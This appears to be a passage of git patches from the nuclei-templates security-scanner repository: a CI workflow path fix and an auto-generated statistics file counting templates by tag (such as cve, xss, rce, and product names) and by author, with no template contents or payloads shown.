primetek | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | From ebec359bfcee304a9c13cde32ad6554ada7fe098 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 20:01:24 +0530 Subject: [PATCH 099/149] path update --- .github/workflows/templates-stats.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 214cf997e7..9457a24b98 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,4 +1,4 @@ -name: Templates Stats +name: 🗒 Templates Stats on: create: @@ -34,12 +34,12 @@ jobs: - name: Markdown Stats run: | - templates-stats -output TEMPLATES-STATS.md -path . + templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/ shell: bash - name: JSON Stats run: | - templates-stats -output TEMPLATES-STATS.json -json -path . + templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/ shell: bash - name: Commit files @@ -54,4 +54,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} + branch: ${{ github.ref }} \ No newline at end of file From 4485a4db26670916446e9a634ddd804703e1ad01 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 14:32:17 +0000 Subject: [PATCH 100/149] Auto Generated Templates Stats [Mon Jul 19 14:32:17 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1204 +++++++++++++++++++++--------------------- 2 files changed, 603 insertions(+), 603 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 5f49fff958..ad6fd08d99 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"logs","count":24},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"springboot","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"cve2011","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"cve2013","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"aws","count":8},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"php","count":8},{"name":"adobe","count":8},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"scada","count":7},{"name":"joomla","count":7},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"xxe","count":6},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"solr","count":5},{"name":"ruijie","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"ssti","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"phpmyadmin","count":5},{"name":"jetty","count":5},{"name":"drupal","count":5},{"name":"ibm","count":4},{"name":"solarwinds","count":4},{"name":"django","count":4},{"name":"moodle","count":4},{"name":"thinkcmf","count":4},{"name":"cve2009","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"docker","count":4},{"name":"vpn","count":4},{"name":"elastic","count":4},{"name":"router","count":4},{"name":"hongdian","count":4},{"name":"netgear","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"tomcat","count":4},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"fileupload","count":4},{"name":"webserver","count":4},{"name":"kafka","count":3},{"name":"crlf","count":3},{"name":"grafana","count":3},{"name":"fpd","count":3},{"name":"oa","count":3},{"name":"ofbiz","count":3},{"name":"r-seenet","count":3},{"name":"springcloud","count":3},{"name":"log","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"deserialization","count":3},{"name":"microstrategy","count":3},{"name":"git","count":3},{"name":"backups","count":3},{"name":"bypass","count":3},{"name":"kubernetes","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"resin","count":3},{"name":"lfr","count":3},{"name":"windows","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"nacos","count":3},{"name":"fanruan","count":3},{"name":"dedecms","count":3},{"name":"openssh","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"odoo","count":2},{"name":"hpe","count":2},{"name":"prometheus","count":2},{"name":"glassfish","count":2},{"name":"jellyfin","count":2},{"name":"smtp","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"service","count":2},{"name":"kibana","count":2},{"name":"ecology","count":2},{"name":"cve2008","count":2},{"name":"sonicwall","count":2},{"name":"vrealize","count":2},{"name":"couchdb","count":2},{"name":"injection","count":2},{"name":"smb","count":2},{"name":"exposures","count":2},{"name":"plesk","count":2},{"name":"jboss","count":2},{"name":"strapi","count":2},{"name":"mail","count":2},{"name":"trixbox","count":2},{"name":"mida","count":2},{"name":"zabbix","count":2},{"name":"xxljob","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"sonarqube","count":2},{"name":"bitrix","count":2},{"name":"nextjs","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"rockethchat","count":2},{"name":"shellshock","count":2},{"name":"frp","count":2},{"name":"chamilo","count":2},{"name":"nexus","count":2},{"name":"voipmonitor","count":2},{"name":"httpd","count":2},{"name":"flir","count":2},{"name":"rstudio","count":2},{"name":"activemq","count":2},{"name":"sharepoint","count":2},{"name":"ucmdb","count":2},{"name":"coldfusion","count":2},{"name":"huawei","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"rockmongo","count":2},{"name":"splunk","count":2},{"name":"microsoft","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"kentico","count":2},{"name":"zhiyuan","count":2},{"name":"globalprotect","count":2},{"name":"leak","count":2},{"name":"hjtcloud","count":2},{"name":"openfire","count":2},{"name":"saltstack","count":2},{"name":"seeyon","count":2},{"name":"hp","count":2},{"name":"proxy","count":2},{"name":"fortios","count":2},{"name":"paloalto","count":2},{"name":"showdoc","count":2},{"name":"intrusive","count":2},{"name":"telerik","count":2},{"name":"webcam","count":2},{"name":"icewarp","count":2},{"name":"bash","count":1},{"name":"hadoop","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"mongo","count":1},{"name":"landrayoa","count":1},{"name":"monitorix","count":1},{"name":"webui","count":1},{"name":"darkstat","count":1},{"name":"rdp","count":1},{"name":"wildfly","count":1},{"name":"zenario","count":1},{"name":"triconsole","count":1},{"name":"jmx","count":1},{"name":"wso2","count":1},{"name":"lotuscms","count":1},{"name":"klog","count":1},{"name":"embedthis","count":1},{"name":"linkedin","count":1},{"name":"faraday","count":1},{"name":"dvwa","count":1},{"name":"mcafee","count":1},{"name":"druid","count":1},{"name":"smartsense","count":1},{"name":"zeroshell","count":1},{"name":"openrestry","count":1},{"name":"rsyncd","count":1},{"name":"alibaba","count":1},{"name":"fastcgi","count":1},{"name":"zookeeper","count":1},{"name":"optiLink","count":1},{"name":"calendarix","count":1},{"name":"netis","count":1},{"name":"rhymix","count":1},{"name":"panabit","count":1},{"name":"livezilla","count":1},{"name":"nuxeo","count":1},{"name":"targa","count":1},{"name":"ems","count":1},{"name":"bullwark","count":1},{"name":"mediumish","count":1},{"name":"firebase","count":1},{"name":"mantisbt","count":1},{"name":"opensns","count":1},{"name":"netdata","count":1},{"name":"kubeflow","count":1},{"name":"nedi","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"aura","count":1},{"name":"svnserve","count":1},{"name":"crm","count":1},{"name":"primetek","count":1},{"name":"lanproxy","count":1},{"name":"svn","count":1},{"name":"ioncube","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"sitecore","count":1},{"name":"sqlite","count":1},{"name":"vscode","count":1},{"name":"cocoon","count":1},{"name":"rubedo","count":1},{"name":"htmli","count":1},{"name":"jnoj","count":1},{"name":"phpunit","count":1},{"name":"rmc","count":1},{"name":"etouch","count":1},{"name":"nexusdb","count":1},{"name":"totaljs","count":1},{"name":"gitlist","count":1},{"name":"wamp","count":1},{"name":"jquery","count":1},{"name":"mailchimp","count":1},{"name":"phpinfo","count":1},{"name":"wp-theme","count":1},{"name":"fedora","count":1},{"name":"grav","count":1},{"name":"krweb","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"varnish","count":1},{"name":"harbor","count":1},{"name":"turbocrm","count":1},{"name":"bolt","count":1},{"name":"discord","count":1},{"name":"geddy","count":1},{"name":"memcached","count":1},{"name":"hasura","count":1},{"name":"eyou","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"fortiweb","count":1},{"name":"uwsgi","count":1},{"name":"interlib","count":1},{"name":"openstack","count":1},{"name":"sprintful","count":1},{"name":"jsf","count":1},{"name":"szhe","count":1},{"name":"bookstack","count":1},{"name":"goahead","count":1},{"name":"geutebruck","count":1},{"name":"episerver","count":1},{"name":"ntopng","count":1},{"name":"stem","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"synnefo","count":1},{"name":"hortonworks","count":1},{"name":"jfrog","count":1},{"name":"ilo4","count":1},{"name":"ecom","count":1},{"name":"ec2","count":1},{"name":"huijietong","count":1},{"name":"yachtcontrol","count":1},{"name":"traefik","count":1},{"name":"tika","count":1},{"name":"zarafa","count":1},{"name":"email","count":1},{"name":"maccmsv10","count":1},{"name":"enum","count":1},{"name":"tapestry","count":1},{"name":"opencast","count":1},{"name":"trilithic","count":1},{"name":"idemia","count":1},{"name":"kerbynet","count":1},{"name":"alertmanager","count":1},{"name":"node-red-dashboard","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"sidekiq","count":1},{"name":"xdcms","count":1},{"name":"favicon","count":1},{"name":"ueditor","count":1},{"name":"spf","count":1},{"name":"shopware","count":1},{"name":"cgi","count":1},{"name":"comodo","count":1},{"name":"checkpoint","count":1},{"name":"nordex","count":1},{"name":"powercreator","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"flash","count":1},{"name":"zm","count":1},{"name":"acme","count":1},{"name":"grails","count":1},{"name":"beanshell","count":1},{"name":"clave","count":1},{"name":"plone","count":1},{"name":"clusterengine","count":1},{"name":"blue-ocean","count":1},{"name":"haproxy","count":1},{"name":"keenetic","count":1},{"name":"cors","count":1},{"name":"wooyun","count":1},{"name":"servicedesk","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"finereport","count":1},{"name":"sentry","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"gridx","count":1},{"name":"cve2005","count":1},{"name":"circontrorl","count":1},{"name":"viewlinc","count":1},{"name":"javascript","count":1},{"name":"codeigniter","count":1},{"name":"wuzhicms","count":1},{"name":"drone","count":1},{"name":"subrion","count":1},{"name":"oscommerce","count":1},{"name":"scs","count":1},{"name":"adminer","count":1},{"name":"enumeration","count":1},{"name":"xiuno","count":1},{"name":"st","count":1},{"name":"sco","count":1},{"name":"mobileiron","count":1},{"name":"csod","count":1},{"name":"socomec","count":1},{"name":"itop","count":1},{"name":"phalcon","count":1},{"name":"dlogin","count":1},{"name":"liferay","count":1},{"name":"rmi","count":1},{"name":"parentlink","count":1},{"name":"linksys","count":1},{"name":"horde","count":1},{"name":"gogs","count":1},{"name":"mautic","count":1},{"name":"ssltls","count":1},{"name":"flink","count":1},{"name":"starttls","count":1},{"name":"javamelody","count":1},{"name":"seacms","count":1},{"name":"salesforce","count":1},{"name":"dompdf","count":1},{"name":"clockwatch","count":1},{"name":"mirai","count":1},{"name":"zend","count":1},{"name":"zmanda","count":1},{"name":"wavemaker","count":1},{"name":"pulsesecure","count":1},{"name":"fastapi","count":1},{"name":"floc","count":1},{"name":"ambari","count":1},{"name":"dotnetnuke","count":1},{"name":"circontrol","count":1},{"name":"fortigate","count":1},{"name":"openerp","count":1},{"name":"fortinet","count":1},{"name":"k8","count":1},{"name":"azure","count":1},{"name":"opm","count":1},{"name":"fortigates","count":1},{"name":"discourse","count":1},{"name":"mara","count":1},{"name":"payara","count":1},{"name":"tenda","count":1},{"name":"symfony","count":1},{"name":"linkerd","count":1},{"name":"biometrics","count":1},{"name":"acexy","count":1},{"name":"exchange","count":1},{"name":"alerta","count":1},{"name":"postgres","count":1},{"name":"diris","count":1},{"name":"rfi","count":1},{"name":"octoprint","count":1},{"name":"gloo","count":1},{"name":"74cms","count":1},{"name":"tamronos","count":1},{"name":"2014","count":1},{"name":"dvr","count":1},{"name":"bruteforce","count":1},{"name":"akamai","count":1},{"name":"zcms","count":1},{"name":"jsp","count":1},{"name":"zte","count":1},{"name":"swagger","count":1},{"name":"xml","count":1},{"name":"pacsone","count":1},{"name":"shopxo","count":1},{"name":"xff","count":1},{"name":"springframework","count":1},{"name":"pippoint","count":1},{"name":"postmessage","count":1},{"name":"webadmin","count":1},{"name":"webmodule-ee","count":1},{"name":"nc2","count":1},{"name":"realteo","count":1},{"name":"kyan","count":1},{"name":"upnp","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"nuuo","count":1},{"name":"k8s","count":1},{"name":"plugin","count":1},{"name":"rabbitmq","count":1},{"name":"redis","count":1},{"name":"appweb","count":1},{"name":"tensorboard","count":1},{"name":"centos","count":1},{"name":"heroku","count":1},{"name":"thinkadmin","count":1},{"name":"majordomo2","count":1},{"name":"concrete","count":1},{"name":"cve2007","count":1},{"name":"db","count":1},{"name":"myucms","count":1},{"name":"mdb","count":1},{"name":"dotnet","count":1},{"name":"redwood","count":1},{"name":"zimbra","count":1},{"name":"csrf","count":1},{"name":"backdoor","count":1},{"name":"extractor","count":1},{"name":"glances","count":1},{"name":"landray","count":1},{"name":"portainer","count":1},{"name":"duomicms","count":1},{"name":"empirecms","count":1},{"name":"nette","count":1},{"name":"anchorcms","count":1},{"name":"mpsec","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"feifeicms","count":1},{"name":"cloudinary","count":1},{"name":"panos","count":1},{"name":"expn","count":1},{"name":"nsasg","count":1},{"name":"tpshop","count":1},{"name":"selea","count":1},{"name":"jenkin","count":1},{"name":"servicenow","count":1},{"name":"razor","count":1},{"name":"erp-nc","count":1},{"name":"rujjie","count":1},{"name":"mongoshake","count":1},{"name":"sarg","count":1},{"name":"bitly","count":1},{"name":"setup","count":1},{"name":"soar","count":1},{"name":"plastic","count":1},{"name":"revision","count":1},{"name":"kafdrop","count":1},{"name":"netrc","count":1},{"name":"jenzabar","count":1},{"name":"spring","count":1},{"name":"tongda","count":1},{"name":"vsftpd","count":1},{"name":"b2evolution","count":1},{"name":"tensorflow","count":1},{"name":"weiphp","count":1},{"name":"javafaces","count":1},{"name":"nomad","count":1},{"name":"webmin","count":1},{"name":"status","count":1},{"name":"wiki","count":1},{"name":"codemeter","count":1},{"name":"skywalking","count":1},{"name":"emby","count":1},{"name":"cobub","count":1},{"name":"ganglia","count":1},{"name":"cve2010","count":1},{"name":"apiman","count":1},{"name":"visionhub","count":1},{"name":"robomongo","count":1},{"name":"xunchi","count":1},{"name":"redhat","count":1},{"name":"fuelcms","count":1},{"name":"mysql","count":1},{"name":"proftpd","count":1},{"name":"ulterius","count":1},{"name":"lansweeper","count":1},{"name":"fortilogger","count":1},{"name":"labtech","count":1},{"name":"netsweeper","count":1},{"name":"pgadmin","count":1},{"name":"ns","count":1},{"name":"arl","count":1},{"name":"moinmoin","count":1},{"name":"kong","count":1},{"name":"opensmtpd","count":1},{"name":"zzzcms","count":1},{"name":"octobercms","count":1},{"name":"upload","count":1},{"name":"pyramid","count":1},{"name":"moin","count":1},{"name":"vsphere","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"blackboard","count":1},{"name":"jitsi","count":1},{"name":"avtech","count":1},{"name":"opentsdb","count":1},{"name":"chinaunicom","count":1},{"name":"jeewms","count":1},{"name":"aspnuke","count":1},{"name":"doh","count":1},{"name":"metinfo","count":1},{"name":"igs","count":1},{"name":"viewpoint","count":1},{"name":"ssl","count":1},{"name":"tileserver","count":1},{"name":"saltapi","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"randomstr1ng","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"melbadry9","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"philippedelteil","count":6},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"ganofins","count":5},{"name":"puzzlepeaches","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"nodauf","count":4},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"kophjager007","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"foulenzer","count":2},{"name":"lu4nx","count":2},{"name":"incogbyte","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"randomrobbie","count":2},{"name":"swissky","count":2},{"name":"manas_harsh","count":2},{"name":"jarijaas","count":2},{"name":"elsfa7110","count":2},{"name":"bp0lr","count":2},{"name":"0xsapra","count":2},{"name":"lotusdll","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"davidmckennirey","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"joeldeleep","count":2},{"name":"mahendra purbia 